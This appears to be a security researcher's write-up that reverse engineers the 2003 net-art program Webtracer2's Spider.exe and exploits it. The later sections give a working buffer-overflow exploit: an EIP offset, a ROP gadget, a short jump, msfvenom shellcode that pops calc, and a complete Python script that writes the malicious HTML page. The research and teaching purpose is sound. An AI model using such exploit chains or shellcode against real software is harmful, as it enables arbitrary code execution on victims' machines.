.+:::::::::::::::::::::::::::::::::::::::::/
.//`+++++++++++++++++++++++++++++++++++++// s
-+/.h+..................................-os s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h+ ss s
-++-yo////////////////////////////////////y`s
-+o-:--------------------------::::-:://:---s
-+/ :-.: +:oo- s
-+/```````````````````````````````````:-````s
./o//////////+o:::::::::::::::::s+/////////::
``://////////+s:::::::::::::::::y+/////////:.
s .::::/osso::::. .+
`.y +yyyyhNNNmyyyy+ .+
`:h:::::/+:::::::::::::+:///////////////////+--------------------
.o s s::::::::::::s.+ - +
-/y .o s ::::::::::::oss+::.+
`-y .o y `+//: .+
`.+/y/::/+:::::::::::::+:::::::::::::::::++:.
`////////////////////////////////////:/.
This article analyzes and hacks the art browser Webtracer2 by the artist Nullpointer from the year 2003.
As he has already described the work on his website, this is shown below. (You might have to open the page in another tab and accept the certificate...)
This article then goes straight into the analysis.
First let's download the webtracer2.zip and unzip it.
The ZIP archive consists of various files. Particularly interesting are the two exe files: Spider.exe and Visualizer.exe.
As the name already suggests, one of them spiders a website and the other one visualises the data.
Nullpointer also documented and described this in detail on the project's website.
So let's start the analysis with Spider.exe, since it has to run first and comes with more interactive functionality.
By this I mean that we can specify the website it requests and therefore control the response, which gives us many possible ways to interact with Spider.exe.
Binary Orientation Methods
To start the analysis let's open the exe in Ghidra.
Ghidra is a software reverse engineering tool.
It helps examine and understand compiled software code, like executable programs and binaries.
With Ghidra, machine code can be decompiled into more readable source code.
The following screenshot shows a method to quickly orientate in the EXE file.
- First we search for strings.
- Then double-click on a string to jump to its location. This is most commonly somewhere in the .rdata section.
- Ghidra then shows the XREF (cross reference) location 01_GET_PAGES:00402c19, which means the string is used somewhere else in the binary.
- Another double-click on the XREF address brings us to the part of the decompiled code where the string is used. In this case it's the function 01_GET_PAGES, which already sounds promising.
Now we have a foothold from where we can continue the analysis. This technique is a powerful way to quickly find relevant parts of the code in large binaries.
Find interesting code by XREF strings
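The first step of this method, searching for strings, can also be approximated outside of Ghidra. The following is a minimal sketch, not part of the original workflow: it scans raw bytes for printable ASCII runs and reports their file offsets. The function name `find_strings` and the sample bytes are made up for illustration, and file offsets are not the same as the virtual addresses Ghidra shows.

```python
import re

def find_strings(data: bytes, needle: bytes, min_len: int = 4):
    """Return (file_offset, text) for printable ASCII runs that contain needle."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [
        (match.start(), match.group().decode("ascii"))
        for match in pattern.finditer(data)
        if needle in match.group()
    ]

# Tiny stand-in for a real binary. With the real file you would pass
# open("Spider.exe", "rb").read() instead (path is an assumption).
sample = b"\x00\x01GETTING PAGE\x00\xff\xfeInternetOpen() failed\x00ab\x00"

for offset, text in find_strings(sample, b"failed"):
    print(hex(offset), text)
```

This only finds the strings. Following the cross references to the code that uses them still needs a disassembler such as Ghidra.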
In this code we can see that some buffers get created in the beginning and later on functions like strcpy are used.
The Microsoft documentation for strcpy warns: "Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead."
This really smells like buffer overflow.
undefined4 __fastcall 01_GET_PAGES(uint param_1)
{
  int iVar1;
  undefined4 uVar2;
  undefined4 auStack1064 [2];
  int iStack1056;
  int iStack1052;
  undefined4 uStack1048;
  char acStack1044 [256];
  undefined auStack788 [256];
  undefined auStack532 [256];
  undefined auStack276 [256];
  int iStack20;
  int iStack16;
  int iStack12;
  uint uStack8;

  *(undefined4 *)(param_1 + 4) = 0;
  uStack8 = param_1;
  status_logger("=======================GETTING PAGE========================");
  status_logger(uStack8 + 0x514);
  strncpy(&DAT_012f766c,"not found",9);
  DAT_012f7675 = 0;
  iStack12 = InternetOpenA("webhack",0,0,0,0);
  if (iStack12 == 0) {
    error_logger("InternetOpen() failed");
  }
  uStack1048 = 5000;
  iVar1 = InternetSetOptionA(iStack12,2,&uStack1048,4);
  if (iVar1 == 0) {
    error_logger("InternetConnect() failed");
    InternetCloseHandle(iStack12);
    uVar2 = 0;
  }
  else {
    iVar1 = InternetSetOptionA(iStack12,8,&uStack1048,4);
    if (iVar1 == 0) {
      error_logger("InternetConnect() failed");
      uVar2 = 0;
    }
    else {
      *(undefined4 *)(uStack8 + 0x914) = 0x3c;
      *(undefined **)(uStack8 + 0x918) = auStack276;
      *(undefined4 *)(uStack8 + 0x91c) = 0x100;
      *(undefined **)(uStack8 + 0x924) = auStack532;
      *(undefined4 *)(uStack8 + 0x928) = 0x100;
      *(undefined4 *)(uStack8 + 0x930) = 0;
      *(undefined4 *)(uStack8 + 0x934) = 0;
      *(undefined4 *)(uStack8 + 0x938) = 0;
      *(undefined4 *)(uStack8 + 0x93c) = 0;
      *(undefined **)(uStack8 + 0x940) = auStack788;
      *(undefined4 *)(uStack8 + 0x944) = 0x100;
      *(undefined4 *)(uStack8 + 0x948) = 0;
      *(undefined4 *)(uStack8 + 0x94c) = 0;
      iVar1 = InternetCrackUrlA(uStack8 + 0x514,0,0,uStack8 + 0x914);
      if (iVar1 == 0) {
        error_logger("InternetCrackURL() failed");
        InternetCloseHandle(iStack12);
        uVar2 = 0;
      }
      else {
        strcpy((char *)(uStack8 + 0x614),*(char **)(uStack8 + 0x940));
        strcpy((char *)(uStack8 + 0x414),*(char **)(uStack8 + 0x924));
        if (*(int *)(uStack8 + 0x920) == 3) {
          iStack16 = InternetConnectA(iStack12,auStack532,uStack8 & 0xffff0000 | (uint)*(ushort *)(uStack8 + 0x92c),0,0,3,0,0);
          if (iStack16 == 0) {
            error_logger("InternetConnect() failed");
            InternetCloseHandle(iStack12);
            uVar2 = 0;
          }
          else {
            iStack20 = HttpOpenRequestA(iStack16,&DAT_00418784,auStack788,0,0,0,0,0);
            if (iStack20 == 0) {
              error_logger("HttpOpenRequest() failed");
              InternetCloseHandle(iStack12);
              uVar2 = 0;
            }
            else {
              iVar1 = HttpSendRequestA(iStack20,0,0,0,0);
              if (iVar1 == 0) {
                error_logger("HttpSendRequest() failed:");
                InternetCloseHandle(iStack12);
                uVar2 = 0;
              }
              else {
                auStack1064[0] = 0x100;
                iVar1 = HttpQueryInfoA(iStack20,0x14,uStack8 + 0x210,auStack1064,0);
                if (iVar1 == 0) {
                  error_logger("HttpQueryInfo() failed: ");
                  InternetCloseHandle(iStack12);
                  uVar2 = 0;
                }
                else {
                  auStack1064[0] = 4;
                  iVar1 = HttpQueryInfoA(iStack20,0x20000013,uStack8 + 0x410,auStack1064,0);
                  if (iVar1 == 0) {
                    error_logger("HttpQueryInfo() failed: Couldn\'t get statusCODE ");
                    InternetCloseHandle(iStack12);
                    uVar2 = 0;
                  }
                  else if (*(int *)(uStack8 + 0x410) == 200) {
                    thunk_FUN_00403280();
                    auStack1064[0] = 100000;
                    iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                    if (iStack1056 == 0) {
                      error_logger("InternetReadFile() failed: didn\'t get page");
                      InternetCloseHandle(iStack12);
                      uVar2 = 0;
                    }
                    else {
                      acStack1044[iStack1052] = '\0';
                      strcpy(&DAT_012f766c,acStack1044);
                      *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                      while (((iStack1052 != 0 && (iStack1052 != 0)) && (*(int *)(uStack8 + 8) < 0x185a1))) {
                        iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                        acStack1044[iStack1052] = '\0';
                        (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                        strcat(&DAT_012f766c,acStack1044);
                        *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                      }
                      (&DAT_012f766b)[*(int *)(uStack8 + 8)] = 0x78;
                      (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                      InternetCloseHandle(iStack12);
                      status_logger("got page");
                      status_logger(uStack8 + 0x110);
                      uVar2 = 1;
                    }
                  }
                  else {
                    error_logger("File Not Found");
                    InternetCloseHandle(iStack12);
                    uVar2 = 1;
                  }
                }
              }
            }
          }
        }
        else {
          error_logger("USE HTTP-URL Local-File");
          InternetCloseHandle(iStack12);
          uVar2 = 0;
        }
      }
    }
  }
  return uVar2;
}
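To illustrate why an unchecked copy into a fixed 256-byte buffer is dangerous, here is a toy model in Python. It is only a sketch: the `frame` layout (a buffer directly followed by a 4-byte value) is an assumption made for illustration and is not the real stack layout of Spider.exe.

```python
def unchecked_strcpy(memory: bytearray, dest: int, src: bytes) -> None:
    """Copy src up to and including a NUL terminator, like C strcpy: no size check."""
    end = src.index(0) if 0 in src else len(src)
    data = src[:end] + b"\x00"
    memory[dest:dest + len(data)] = data

BUF_SIZE = 256

# Toy frame: a 256-byte buffer, a 4-byte value standing in for a saved
# pointer, and some padding so the model itself does not grow.
frame = bytearray(BUF_SIZE) + bytearray(b"\xef\xbe\xad\xde") + bytearray(8)

# 260 bytes do not fit into 256: the last four "A"s land on the neighbour.
unchecked_strcpy(frame, 0, b"A" * 260)
neighbour = bytes(frame[BUF_SIZE:BUF_SIZE + 4])
print(neighbour.hex())
```

The neighbouring value is now 41414141, the same marker that shows up in the registers later in this article.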
Another method to identify interesting parts of the code is similar. But this time we trace not strings but calls to functions in the imported libraries.
Here we use for example the strcmp function.
- Expand the Symbol Tree in Ghidra on the left and search for interesting function names
- Use the XREF / Cross Reference to navigate to the part of code where the interesting function is used
In other binaries this is a good method to identify a call to some network connection function.
First locate the socket connection library function. Then it can be traced back via the XREFs until a relevant part of the custom code is reached.
The custom code where a network connection is initialised is often a good starting point for reversing protocols.
This may also be a good spot for a breakpoint in further dynamic analysis with a debugger.
Find interesting code by XREF function calls in libs
Dynamic Analysis
So far we have peeked into the decompiled source code and browsed a little through the binary.
But to get more impressions of the whole picture, let's do some dynamic analysis.
First we proxy the traffic through Burp.
Add "127.0.0.1 hacking.art" to /etc/hosts, you know the game.
Another interesting way to proxy client applications is this tool:
https://www.proxifier.com/.
It can be useful if the hosts file cannot be used or if various URLs should be requested independently of Burp's proxy forwarding configuration.
Anyways, in the end there is nothing more happening than a simple GET request:
GET / HTTP/1.1
User-Agent: webhack
Host: hacking.art
Connection: close
We can also intercept the response and manually tamper with the HTTP and HTML to provoke some reactions.
This is manual and repetitive and most likely gets us nowhere in a reasonable timeframe. Nevertheless it is good practice and maybe good for a lucky quick win.
To automate more, we can use an approach similar to the fuzzing shown in Weirdstalker.
But to find a vulnerability I didn't even need fuzzing.
Before we exploit the program, however, let's have a little bit of fun with it.
I reused my fuzzing code mentioned above and modified it to generate pages for the Spider on the fly.
This means the Spider requests up to 1000 pages and all of them have random links.
# load the needed libraries
import socket
import threading
import importlib
import mylib

# prepare the socket to send data via TCP
bind_ip = "0.0.0.0"
bind_port = 80
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this will open a port on the system and waits for a connection from webstalker
server.bind((bind_ip, bind_port))
server.listen(5)

# if a client connects:
def handle_client(client_socket):
    importlib.reload(mylib)
    html = mylib.html()
    # receiving whatever the client talks
    request = client_socket.recv(1024)
    print(f"sending {len(html)} bytes")
    # send data (pls crash) and close the connection
    client_socket.send(html)
    client_socket.close()

# some multi threaded client handling
while True:
    client, addr = server.accept()
    print(f"[*] Accepted connection from: {addr[0]}:{addr[1]}")
    client_handler = threading.Thread(target=handle_client, args=(client,))
    client_handler.start()
To avoid stopping and starting the script every time we want to change the HTML, we reload the second part as a library at runtime.
This allows us to modify the second script while the server is running. The new version gets loaded on the next request, for example when we call the server with a browser.
In this case the code generates 100 random links.
When requested by Spider.exe, it follows the links and therefore in the end a visualisation with 100 dots and lines gets generated.
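The second script itself is not shown in this article. As a rough sketch of what such a `mylib` module could look like, the following generates a complete HTTP response with 100 random links. Only the function name `html()` comes from the server script above. The link format, the headers and the helper `random_link` are assumptions for illustration.

```python
import random
import string

def random_link() -> str:
    """Build one anchor tag pointing at a random, made-up page name."""
    name = "".join(random.choices(string.ascii_lowercase, k=8))
    return f'<a href="/{name}.html">{name}</a>'

def html(link_count: int = 100) -> bytes:
    """Return a full HTTP response (status line, headers, body) as bytes."""
    links = "\n".join(random_link() for _ in range(link_count))
    payload = f"<html><body>\n{links}\n</body></html>".encode("ascii")
    header = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return header.encode("ascii") + payload
```

Because the server writes the return value straight to the raw socket, the sketch includes the status line. The decompiled function shows that Spider.exe only reads the page when the status code is 200.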
But it's also possible to generate more complex pages with nested layers of links and logic depending on what link is requested.
The following code shows an example:
For Spider.exe this results in quite some work, because the higher Fibonacci numbers generate a lot of links.
But in the end the Visualizer produces some nice structures from this data.
Hundreds of generated linked pages visualized
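The idea of nested, path-dependent pages can be sketched as follows. This is not the code used for the visualisation above, just one possible way to do it: the number of links on a page grows with its depth along the Fibonacci sequence. The URL scheme, `max_depth` and all function names are assumptions.

```python
def fib(n: int) -> int:
    """Return the n-th Fibonacci number (fib(0) = 0, fib(1) = 1)."""
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a

def child_links(path: str, max_depth: int = 5) -> list[str]:
    """Links for the page at path: a page at depth d gets fib(d + 2) children."""
    parts = [part for part in path.split("/") if part]
    depth = len(parts)
    if depth >= max_depth:
        return []  # leaf page, stops the spider from running forever
    base = "/" + "/".join(parts) if parts else ""
    return [f"{base}/{i}" for i in range(fib(depth + 2))]

def page_for(path: str) -> str:
    """Render the HTML body for the requested path."""
    anchors = "\n".join(f'<a href="{link}">{link}</a>' for link in child_links(path))
    return f"<html><body>\n{anchors}\n</body></html>"

print(child_links("/"))
print(child_links("/0"))
```

To use something like this, the server would have to parse the requested path from the GET line and pass it on, which the server script shown earlier does not do yet.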
Lucky Buffer Overflow
Now let's get to the fun part.
As mentioned above, in the decompiled code we saw some dangerous functions like strcpy.
As long as we follow the common HTML code structure the Spider.exe eats it.
Our hundreds of randomly generated links were slow but processed in the end.
So what if we "break" the structure?
There are two possible breaking points. On the one hand the HTTP headers and on the other hand some "experimental" HTML code.
Let's try something like the following and hope Spider.exe chokes on something:
And indeed. It really was my first attempt. The HTML was loaded and the debugger showed EXCEPTION_ACCESS_VIOLATION.
EDX gets overwritten with 41414141 in the imported library MSVCRTD.DLL. That is something we can work with.
What's interesting is that the application does not stop immediately at the first EXCEPTION_ACCESS_VIOLATION.
Probably only the DLL crashes. The execution returns to Spider.exe and crashes a second time. A second crash dump gets created as well.
And the second crash happens because back in Spider.exe this cheeky little piece of code wants to be executed:
The second last instruction writes 41414141 to ECX and the last call instruction tries to execute code there.
This means EIP now is 41414141 and we directly control the execution flow.
What a lucky shot!!!
EIP gets overwritten with 41414141
Crafting the Exploit
To craft a fully working exploit we need to find the right offset to inject our shellcode.
For this we can use Metasploit's pattern_create.
This is a tool that creates a string of a given length with a specific, non-repeating pattern.
Afterwards EIP gets overwritten with a small but recognisable part of the pattern.
This part can be searched for in the original pattern, which yields the exact byte offset at which the buffer content overwrites the EIP register.
Another look in the crash dump reveals the value that ended up in EIP, and pattern_offset translates it into the exact byte offset.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6b43356b
[*] Exact match at offset 1876
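The lookup can be reproduced in a few lines of Python. This is a sketch of the well-known upper/lower/digit pattern scheme, not Metasploit's actual code. The function names mirror the tools but are my own. The register value is packed as little-endian because that is how x86 stores it in memory.

```python
import string
import struct

def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern Aa0Aa1Aa2... truncated to length bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(register_value: int, length: int = 8192) -> int:
    """Return the offset of the 4 bytes found in a register, or -1."""
    needle = struct.pack("<I", register_value)  # 0x6b43356b -> b"k5Ck"
    return pattern_create(length).find(needle)

print(pattern_offset(0x6B43356B))  # prints 1876
```

The result matches the offset reported by pattern_offset.rb above.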
Let's confirm that by writing CCCC (43434343 in hex) to EIP.
It works perfectly as the crashdump shows:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(3574.1580): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
eax=00000000 ebx=00000000 ecx=43434343 edx=77d88ad0 esi=00000000 edi=00000000
eip=43434343 esp=000a16d0 ebp=000a16f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
43434343 ?? ???
Now we just need to jump to somewhere we can write to.
Unfortunately the stack addresses begin with a null byte. For example: 0019F6C8, which is directly behind the overflow offset.
This means we cannot just write this address to EIP. We have to get a little bit creative.
At the time the call ECX instruction gets executed, there are a few stack addresses on the stack.
One of them can possibly be used for the exploit: 0019F6C0.
It is the second address on the stack at this point.
Stack address to return to
This means we need a gadget that pops two registers and then returns.
The first pop removes the return address that call ECX pushed. The second pop removes the value behind it, and ret then returns to the third, which we control because it points right before the overflow offset.
This gadget must not contain a null byte either.
To search for a suitable gadget we can use the ROPgadget tool:
└─$ ROPgadget --binary MSVCRTD.DLL --depth 5 --console
(ROPgadget)> load
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
(ROPgadget)> search pop ; pop ; ret
[...]
0x10217b07 : pop esi ; pop edi ; ret
It seems we have found a candidate in MSVCRTD.DLL.
Instead of CCCC we can now write \x07\x7b\x21\x10 at the offset.
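Converting the gadget address into the bytes for the payload, and checking it for null bytes at the same time, can be sketched like this. The helper `pack_address` is a made-up name. `struct.pack("<I", ...)` produces the little-endian byte order x86 expects.

```python
import struct

def pack_address(address: int, bad_bytes: bytes = b"\x00") -> bytes:
    """Pack a 32-bit address as little-endian and reject forbidden bytes."""
    packed = struct.pack("<I", address)
    found = sorted({byte for byte in packed if byte in bad_bytes})
    if found:
        raise ValueError(f"address {address:#010x} contains bad bytes: {found}")
    return packed

print(pack_address(0x10217B07))  # gadget in MSVCRTD.DLL

try:
    pack_address(0x0019F6C0)  # stack address with a leading null byte
except ValueError as error:
    print(error)
```

The gadget address passes the check, while the stack address is rejected because of its leading null byte.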
But now we jump to an address 4 bytes before the EIP overwrite.
That is really not enough space for all the shellcode.
We need another little trick to jump a few bytes further, past the gadget address.
To quickly play with ASM instructions (assemble / disassemble), this website can be helpful:
https://defuse.ca/online-x86-assembler.htm#disassembly2
After some research I found this website:
https://thestarman.pcministry.com/asm/2bytejumps.htm
which discusses two-byte JMP instructions.
In the end we just need the short jump instruction plus the offset we want to jump.
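In our case the necessary bytes are eb 04: the opcode eb followed by a one-byte displacement of 4, which skips the 4-byte gadget address.
Let's place \x90\x90\xeb\x04 right before the gadget address, as the exploit script does.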
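The exploit script in this article encodes the jump as \x90\x90\xeb\x04. The following sketch shows how a two-byte short jump is built and where it lands. The helper names are my own. The offsets 1872 and 1876 come from the script and the pattern_offset result.

```python
import struct

def short_jmp(displacement: int) -> bytes:
    """Encode JMP rel8: opcode 0xEB followed by a signed 8-bit displacement."""
    return b"\xeb" + struct.pack("b", displacement)

def landing_offset(jmp_offset: int, displacement: int) -> int:
    """The displacement counts from the end of the 2-byte jump instruction."""
    return jmp_offset + 2 + displacement

# Layout in the payload: 1872 filler bytes, two NOPs, the jump, the gadget.
nops = b"\x90\x90"
jump = short_jmp(4)
jmp_offset = 1872 + len(nops)   # the jump itself sits at offset 1874
gadget_offset = 1876            # 4-byte gadget address overwriting EIP

print((nops + jump).hex())
print(landing_offset(jmp_offset, 4))
```

The jump lands at offset 1880, the first byte after the 4-byte gadget address, which is where the NOPs and later the shellcode are placed.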
To write raw bytes to a file we can use python.
import sys;
sys.stdout.buffer.write(b"\x90\x90")
At the moment our exploit looks like this:
import sys

pre = b"""<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Test</title></head><body>"""
pre += b"<a"
# dont know why exactly
# but we need a link before the BOF
# and it has to have at least 252 spaces to work
pre += b" " * 252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A" * 1872
# short jump forward behind overflow
link += b"\x90\x90\xeb\x04"
# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"
# nop buffer and Stop
link += b"\x90\x90\x90\x90\xCC"
# this is also needed for exploit to work, think of the first crash in dll
link += b"A" * 2000
link += b"\"></a>"

post = b"""</body></html>"""
html = pre + link + post
sys.stdout.buffer.write(html)
Let's try it:
Works like a charm
Time to place the shellcode.
To generate shellcode we simply use the classic msfvenom pop calc method.
Let's also directly exclude null bytes and format the output as C so we can paste it into our exploit script.
└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 952 bytes
unsigned char buf[] =
"\xbe\xfa\xf5\xdc\xb1\xdd\xc2\xd9\x74\x24\xf4\x5d\x29\xc9"
"\xb1\x31\x83\xed\xfc\x31\x75\x0f\x03\x75\xf5\x17\x29\x4d"
"\xe1\x5a\xd2\xae\xf1\x3a\x5a\x4b\xc0\x7a\x38\x1f\x72\x4b"
"\x4a\x4d\x7e\x20\x1e\x66\xf5\x44\xb7\x89\xbe\xe3\xe1\xa4"
"\x3f\x5f\xd1\xa7\xc3\xa2\x06\x08\xfa\x6c\x5b\x49\x3b\x90"
"\x96\x1b\x94\xde\x05\x8c\x91\xab\x95\x27\xe9\x3a\x9e\xd4"
"\xb9\x3d\x8f\x4a\xb2\x67\x0f\x6c\x17\x1c\x06\x76\x74\x19"
"\xd0\x0d\x4e\xd5\xe3\xc7\x9f\x16\x4f\x26\x10\xe5\x91\x6e"
"\x96\x16\xe4\x86\xe5\xab\xff\x5c\x94\x77\x75\x47\x3e\xf3"
"\x2d\xa3\xbf\xd0\xa8\x20\xb3\x9d\xbf\x6f\xd7\x20\x13\x04"
"\xe3\xa9\x92\xcb\x62\xe9\xb0\xcf\x2f\xa9\xd9\x56\x95\x1c"
"\xe5\x89\x76\xc0\x43\xc1\x9a\x15\xfe\x88\xf0\xe8\x8c\xb6"
"\xb6\xeb\x8e\xb8\xe6\x83\xbf\x33\x69\xd3\x3f\x96\xce\x2b"
"\x0a\xbb\x66\xa4\xd3\x29\x3b\xa9\xe3\x87\x7f\xd4\x67\x22"
"\xff\x23\x77\x47\xfa\x68\x3f\xbb\x76\xe0\xaa\xbb\x25\x01"
"\xff\xdf\xa8\x91\x63\x0e\x4f\x12\x01\x4e";
Unfortunately that doesn't work...
In the debugger it looks like the shellcode gets destroyed.
The application overwrites the buffer during execution again.
After a bit of trial and error I found the solution.
Since the program expects to parse a link, all URL or HTML meta characters are bad.
The shellcode breaks if it contains bytes that translate to, for example, these ASCII characters: " # ' ? > and also line breaks (0d or 0a).
To get all bad chars we can just create all possible hex values and use them as shellcode.
Then inspect the buffer and remove the bad chars.
Unfortunately, this is a somewhat manual and annoying process.
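The comparison step can be partly automated. The following is a minimal sketch under the assumption that the buffer contents have already been copied out of the debugger as bytes. The function names are made up, and the "observed" data here is simulated rather than taken from a real dump.

```python
def all_bytes(exclude: bytes = b"\x00") -> bytes:
    """Every byte value from 0x00 to 0xff except the known bad ones."""
    return bytes(value for value in range(256) if value not in exclude)

def first_bad_char(sent: bytes, observed: bytes):
    """Return the first byte that did not arrive unchanged, or None."""
    for index, expected in enumerate(sent):
        if index >= len(observed) or observed[index] != expected:
            return expected
    return None

sent = all_bytes()
# Simulated dump: pretend the parser cut the buffer at the double quote.
observed = sent[:sent.index(0x22)]

bad = first_bad_char(sent, observed)
print(hex(bad))
```

Each bad byte found this way is added to `exclude` and the test is repeated until the whole sequence survives in memory.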
└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00\xff\x0a\x0d\x22\x23\x27\x3e\x3f" -f c
The final exploit looks like this:
import sys

pre = b"""<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Test</title></head><body>"""
pre += b"<a"
# dont know why exactly
# but we need a link before the BOF
# and it has to have at least 252 spaces to work
pre += b" " * 252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A" * 1872
# short jump forward behind overflow
link += b"\x90\x90\xeb\x04"
# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"
# nop buffer
link += b"\x90\x90\x90\x90"
# shellcode
# bad 00 0a 0d 22 23 27 3e 3f
link += b"\xdb\xdb\xba\x60\xe1\xe5\x4b\xd9\x74\x24\xf4\x58\x29\xc9"
link += b"\xb1\x31\x31\x50\x18\x83\xe8\xfc\x03\x50\x74\x03\x10\xb7"
link += b"\x9c\x41\xdb\x48\x5c\x26\x55\xad\x6d\x66\x01\xa5\xdd\x56"
link += b"\x41\xeb\xd1\x1d\x07\x18\x62\x53\x80\x2f\xc3\xde\xf6\x1e"
link += b"\xd4\x73\xca\x01\x56\x8e\x1f\xe2\x67\x41\x52\xe3\xa0\xbc"
link += b"\x9f\xb1\x79\xca\x32\x26\x0e\x86\x8e\xcd\x5c\x06\x97\x32"
link += b"\x14\x29\xb6\xe4\x2f\x70\x18\x06\xfc\x08\x11\x10\xe1\x35"
link += b"\xeb\xab\xd1\xc2\xea\x7d\x28\x2a\x40\x40\x85\xd9\x98\x84"
link += b"\x21\x02\xef\xfc\x52\xbf\xe8\x3a\x29\x1b\x7c\xd9\x89\xe8"
link += b"\x26\x05\x28\x3c\xb0\xce\x26\x89\xb6\x89\x2a\x0c\x1a\xa2"
link += b"\x56\x85\x9d\x65\xdf\xdd\xb9\xa1\x84\x86\xa0\xf0\x60\x68"
link += b"\xdc\xe3\xcb\xd5\x78\x6f\xe1\x02\xf1\x32\x6f\xd4\x87\x48"
link += b"\xdd\xd6\x97\x52\x71\xbf\xa6\xd9\x1e\xb8\x36\x08\x5b\x36"
link += b"\x7d\x11\xcd\xdf\xd8\xc3\x4c\x82\xda\x39\x92\xbb\x58\xc8"
link += b"\x6a\x38\x40\xb9\x6f\x04\xc6\x51\x1d\x15\xa3\x55\xb2\x16"
link += b"\xe6\x35\x55\x85\x6a\x94\xf0\x2d\x08\xe8"
# nop buffer
link += b"\x90\x90\x90\x90"
# this is also needed for exploit to work, think of the first crash in dll
link += b"A" * 1500
link += b"\"></a>"

post = b"""</body></html>"""
html = pre + link + post
sys.stdout.buffer.write(html)